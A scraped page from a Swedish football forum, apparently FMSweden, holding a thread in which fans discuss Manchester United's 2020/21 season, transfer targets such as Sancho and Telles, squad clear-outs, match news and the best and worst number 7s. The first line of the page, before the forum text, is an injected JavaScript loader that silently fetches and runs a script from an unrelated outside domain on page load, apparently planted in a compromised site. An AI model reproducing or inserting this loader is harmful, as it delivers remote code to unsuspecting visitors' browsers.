;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manchester United 2020/21 – Arkiverat – FMSweden Forum
Meny Stäng

Manchester United 2...

Share:
Notifications
Clear all

Manchester United 2020/21

26 Inlägg
15 Users
22 Reactions
1,302 Visningar
(@finnfan1)
Active Member
Topic starter  

En tredjeplats i ligan som innebär en Champions League-plats och fortfarande chans på en titel i Europa League får väl ses som ett stort kliv framåt framförallt med tanke på hur spelet såg ut de senaste 15-20 matcherna.

Framåt så hoppas vi på ett fint transferfönstret där jag anser att tre-fyra spelare skulle behövas för att vi ska ta ytterligare steg för att kunna utmana Liverpool & Manchester City.

Högst upp på önskelistan:

En central mittfältare av mer defensiv riktning (ex. Partey)

En mittback (ex. Skriniar)

En högerytter (ex. Sancho)

Citera
Sir-Grecco
(@sir-grecco)
Eminent Member

Gillar din tanke, men för att vi ska värva in en defensiv mittfältare krävs det att vi gör oss av med både Matic och eventuellt Fred som gjort en väldigt bra säsong innan corona uppehållet. Sen har vi också McTominay i truppen som är mer defensivt lagt. I mitt tycke skulle en ny mittfältare göra mer skada än nytta eftersom jag har svårt att se att Fred kommer att få lämna.

Angående högerytter positionen är det en svår fråga, Sancho skulle förmodligen passa in, men beroende prislappen är jag för och emot det. James håller inte för att utmana om titeln. Greenwood är fortfarande ung så det är ett dilemma. Förhoppningsvis lägger vi inte pengarna på skräp denna gången, men det återstår att se....

Angående backlinjen så tycker jag Linderlöf får onödigt mycket kritik, är fortfarande osäker i frågan om han håller i ett världsklass lag, men på sikt och med rätt partner så tror jag han hade växt. Realistiskt tror jag Linderlöf antingen försvinner eller blir petad om en ny mittback värvas vilket behövs. Har väldigt svårt för Maguire, men i och med att han är britt och pengarna vi gav för honom så kommer han inte att ersättas.

Vi har också i mitt tycke en del spelare som gjort sitt, Mata, Matic, Lingard, Jones som jag inte har något emot om de försvinner. Frågetecken kring Dean Henderson, efter hans säsong i Sheffield hade jag gärna sett han som första keeper nästa säsong och att man säljer De Gea. 

SvaraCitera
(@henke)
Eminent Member

• Sancho in! Greenwood ska inte vara no1, James ska inte vara no1. Sancho in är helt rätt.
  • Mittback in som gör Lindelöf till no3, jag tror inte han har den bredden som krävs för att starta i ett världsklasslag (huvudspelet). Men tror INGEN kom förbi honom i PL på hela jävla säsongen. Okej, han behöver inte vara no3 men United behöver 3 hela mittbackar som kan leverera i PL, CL osv, inte bara 2st. Maguire o VNL kommer inte orka med det tror jag. Plus, vad händer om ngn av de skadar sig. MAguire har också uppenbara brister men han är kapten och har högre rang så go figure vilka som kommer vara no2 och 3. Jones och Smalling tror jag försvinner. Bailly kvar som no3 och 4?
  • Deano ett år till i SHU eller no 2 bakom DDG. DDG måste få reda på att han kommer bli petad om han inte slutar med sina misstag, alternativt inte väger upp de med fantomräddningar.
  • En till forward? Ja, Ighalo är bara på lån så det kanske behöver breddas även där.

Tror jag nöjer mig där.

SvaraCitera
aandreaslarsson
(@aandreaslarsson)
New Member

Först och främst hoppas jag att man snart börjar sälja av stora delar av truppen. I nuläget återfinns det så sjukt mycket dökött i form av Jones, Smalling, Rojo, Bailly (duktig men i princip alltid skadad), Matic, Fred, Pereira, Mata, Lingard och så vidare. Matic i och med sitt nykritade kontrakt samt Fred kan jag tänka mig att behålla men i övrigt tycker jag att United spenderar så sjukt mycket onödiga pengar på diverse spelarlöner som skulle kunna spenderas på annat. Hoppas även jag på en ny högkvalitativ mittback samt ytterligare ett hot framåt i form av Sancho, Havertz eller liknande. På mitten hoppas jag att McTominay tar ytterligare kliv och gör platsen bredvid Pogba till sin egen.

SvaraCitera
Antonsson4
(@antonsson4)
Active Member

Vad tycker ni om Shaw? Jag ogillar honom riktigt mycket och jag anser att vänsterbackspositionen är en del som behövs förstärkas. Dalots situation är också ett frågetecken

Sir-Grecco reacted
SvaraCitera
Pontus Wernbloom
(@pontus-wernbloom)
Eminent Member Admin

@antonsson4 håller med dej helt. Är det något United behöver så är det en ny vänsterback!

PW

SvaraCitera
Eken
 Eken
(@eken)
Active Member

Anser att klubben bör kolla på att främst få in mer bredd framåt. Vad har man att sätta in bakom Martial/Rashford/Greenwood liksom. Lingard är ju inget som oroar motståndare precis. En mittback hade suttit fint, skulle också vilja ta in en vänsterback. 

SvaraCitera
Yayakolo
(@yayakolo)
Medlem

Jag tycker Rashford och Greenwood är dom att satsa på. Rashford är redan bra och Greenwood är sjukt spännande som kan ta enorma kliv med speltid. Det är Martial jag är osäker kring. Tycker han är alldeles för ojämn för att leda ett lag mot de största titlarna.

Hade jag varit i United hade jag nog försökt få in någon istället för Martial att spela med Greenwood och Rashford och antingen spela Martial som rotation och om han gnäller sälja honom. Visst är Martial en riktigt bra spelare på en bra dag, men tycker att han är svag för ofta, framförallt när det går lite emot.

SvaraCitera
Eken
 Eken
(@eken)
Active Member

Tycker vi ska fortsätta använda samtliga. Men att försöka ta in bra backups. Trion gjorde vad, 55? mål tillsammans. Så hårt slag om någon av de skulle blivit långtidsskadad under säsongen. 

SvaraCitera
aandreaslarsson
(@aandreaslarsson)
New Member

Vore definitivt fint med en ny vänsterback, har gillat det jag sett hos Williams men fortsatt något valpig (förståeligt i och med hans ålder). Har dock svårt att se vem som skulle kunna vara tillgänglig för ett rimligt pris och hoppas då även att man säljer Shaw om man väljer att plocka in en ny vänsterback.

SvaraCitera
Niklas7
(@niklas7)
Trusted Member

Shaw har ju faktiskt varit ganska bra efter coronan, dock är han alldeles för självklar på sin position för tillfället, Brandon Williams i all ära men det är nog inte nu han ska vara som allra bäst. United hade mått bra av att få in bra vänsterback som pressar Shaw ordentligt. Gällande topptrion så är jag lite av den att jag har svårast för Martial, fantastiskt bra när han vill, men förbannat iskall när matchen inte har börjat bra för honom. Blir ett spännande transferfönster, alla rykten ska inte tros på, ha inte för stora förhoppningar gällande värvningar, detta är ändå på riktigt och inte FM, glöm inte det.

SvaraCitera
Charlielindkvist
(@charlielindkvist)
New Member

Jag startade en save med Milan o körde stenhårt på diamanten, fungerade kalas o hade ett mittfält m Bennacer (marcos llorente, lån) partey-kessie (Riccardi, lån) o paqueta. Slog mig att United med en diamant hade passat utmärkt. Shaw (williams) - lindelöf, maguire - WBS - Matic (MCT + nyförvärv) - Pogba (Fred), partey typen - fernandes - Rashford, Greenwood (Martial). Är man helt ute o cyklar? Tänker att det blir min nästa save

Loba reacted
SvaraCitera
JS7
 JS7
(@js7)
Eminent Member

För att få lite löneutrymme och in lite transferpengar så hade jag försökt att skeppa Sanchez, Jones, Pereira, Mata, Lingard & Romero om nu DdG och DH ska vara våra alt nästa säsong.

Några spelare jag skulle vilja ha in är 

* Nikola Milenkovic ( Fiorentina ) stor stark snabb. Nya Vidic?

* Denis Zakaria ( Mönchengladbach ) Skulle tillsammans med Bruno och Pogba bilda grym triangel på mittfältet. Tycker han verkar väldigt allsidig då han både är löpstark och en bollvinnare.

* Jadon Sancho ( Dortmund ) Hans poängfacit talar sitt tydliga språk.

* Oscar Rodriques ( Real Madrid Castilla ) fastande för han förra året via fm, därefter började jag kolla på han har ett fantastik skott men även bra på frisparkar. Skulle kunna vara en bra avlastningspelare med stor potential.

* Alex Tellas ( Porto ) om vi nu mot all förmodan ha råd med en vänsterback i slutändan skulle gärna se denna kille.

Jätte stolt att vi satsar mycket på egna produkter, men vi måste sluta köpa engelska spelare som har samma potential eller som är lika bra som vissa utomlands. Vi har absolut inga problem med Homegrown regeln och borde kunna hitta billigare alt som när vi värvade Vidic och Evra. Vi måste börja scouta betydligt bättre för att komma upp på samma nivå som tidigare.

SvaraCitera
The Gustine
(@the-gustine)
Trusted Member

"Inter Milan will not pay a fee for Alexis Sánchez from #mufc. He will join for free with Inter paying his full wage."

-@FabrizioRomano

"Jadon Sanco´s transfer fee is set to break the British transfer record, reaching around £108 m."

-@AdrianJKajumba

Sánchez lämnar och Sanchos övergång närmar sig för varje dag som går - två härliga nyheter ikväll. United kommer alltså slippa betala de €60m till Sánchez som återstår i lön på hans kontrakt till 21/22. Lägg där till att Phil Jones fortfarande inte är tillbaka i träning med laget trots att OGS för flera veckor sedan sa att han snart skulle vara tillbaka. Ett tecken på att även han gjort sitt i klubben?

thegustine @Twitter.

JS7 reacted
SvaraCitera
The Gustine
(@the-gustine)
Trusted Member

Onsdag och matchdag. Tämligen avslagen match mot LASK där United har med sig 5-0 från första mötet. Någotsom innebär att laget kommer roteras ordentligt jämfört med det laget som spelare i spurten av ligan. 

Rapporterad elva: 

Romero; Laird, Bailly, Mengi, Williams; McTominay, Fred; James, Lingard, Chong; Ighalo

Ska bli spännande att se om Mengi får chansen från start. Hoppas även att Laird får några minuter.

News: 

- Hemmatröjan för 20/21 är släppt och kommer att användas för första gången ikväll mot LASK. En tröja som växer och går från det bussäte den först liknades vid först. Däremot är fonten som ska användas i cuper för namn och nummer ingen höjdare... 

- Brandon Williams signade nytt kontrakt till 2024. En bra breddspelare med stort hjärta för klubben. 

- Roma och United lyckades inte komma överens om en övergång för Chris Smalling och han är nu tillbaka i klubbem. OGS ger väl inget riktigt tydligt svar på om Smalling ingår i hans planer framöver utan pratar mest om att han tidigare bevisat sig vara en värdefull spelare och att han gjort det bra i Roma. Ole tillägger även att det just nu inte finns några planer på att värva några mittbackar under fönstret. 

- Enligt portugisisk media ska United och Porto vara i långt gånga förhandlingar gällande vänsterbacken Alex Telles. Porta ska enligt uppgifter kräva €30 m. Telles har dessutom en utköpsklausul på €40 m. Hur vida dessa uppgifter är trovärdiga eller inte återstår att se. Oavsett känns en ny vänsterback på sin plats och välkommet med tanke på Shaws skadehistorik och i mina ögon blandade insatser. 

thegustine @Twitter.

JS7 and Supersub reacted
SvaraCitera
Q
 Q
(@q)
Estimable Member

@the-gustine

Bra inlägg. Så ska det se ut! Uppskattas.

E: Ja, på förra sidan då.

VI HAR ALLTID DRÖMT OM ATT SPELA I BLÅRANDIGT - SPELA SOM I VÅRA DRÖMMAR!

The Gustine reacted
SvaraCitera
The Gustine
(@the-gustine)
Trusted Member

Dagen efter den minst sagt sömniga 2-1 segern mot LASK. Tycker James tyvärr återigen visar att han har stora problem i matcher där United är spelförande. Vänsterkanten med James och Williams var minst sagt bedrövliga första halvlek. Williams har svårt att få till kvalitativa inlägg då han är högerfotad och har en vänsterfot mest som ett stödjeben. 

Dagens nyheter: 

- I kvartsfinalen väntar nu danska FC Köpenhamn. Matchen spelas på måndag. 

- Tahith Chong ska vara på väg att lånas ut till Bundesliga och Werder Bremen. 

- OGS bekräftade efter matchen igår att Sánchez lämnar för Inter. Lär presenteras under dagen. 

Solskjær on Alexis Sánchez to Inter Milan: "I can confirm that. He’s a good player, we wish him well."

- Dagens Sancho... Enligt tyska Bild är affären mellan United och Dortmund nu imminent. Sancho uppges få den mytomspunna tröja nummer 7. Det pratas just nu om att övergångssumman ska delas upp på 3 år. €70m år 1, €20m år 2 och €30m år 3. 

- OGS kommer inte ge laget någon lediget inför starten av Premier League den 12 september oavsett hur det går i Europa League-slutspelet. 

thegustine @Twitter.

Q reacted
SvaraCitera
Q
 Q
(@q)
Estimable Member

Jag vill ha två listor på spelare som lirat i nummer 7. Första listan ska vara de bästa, andra listan ska vara de sämsta. Topp 3 på båda.

VI HAR ALLTID DRÖMT OM ATT SPELA I BLÅRANDIGT - SPELA SOM I VÅRA DRÖMMAR!

SvaraCitera
Antonsson4
(@antonsson4)
Active Member

Postad av: @ragnar

Jag vill ha två listor på spelare som lirat i nummer 7. Första listan ska vara de bästa, andra listan ska vara de sämsta. Topp 3 på båda.

De sämsta är väl just dem senaste. Sanchez, Depay, Di Maria, Valencia och Owen

SvaraCitera
Eken
 Eken
(@eken)
Active Member

Bästa
1. Ronaldo
2. Cantona
3. Beckham

Sämsta
1. Di Maria
2. Owen
3. Valencia

Skulle jag nog säga. Går ju absolut säga att Best är bästa 7an osv. Men tänkte mer modern tid nu.

SvaraCitera
Sida 1 / 2
Share: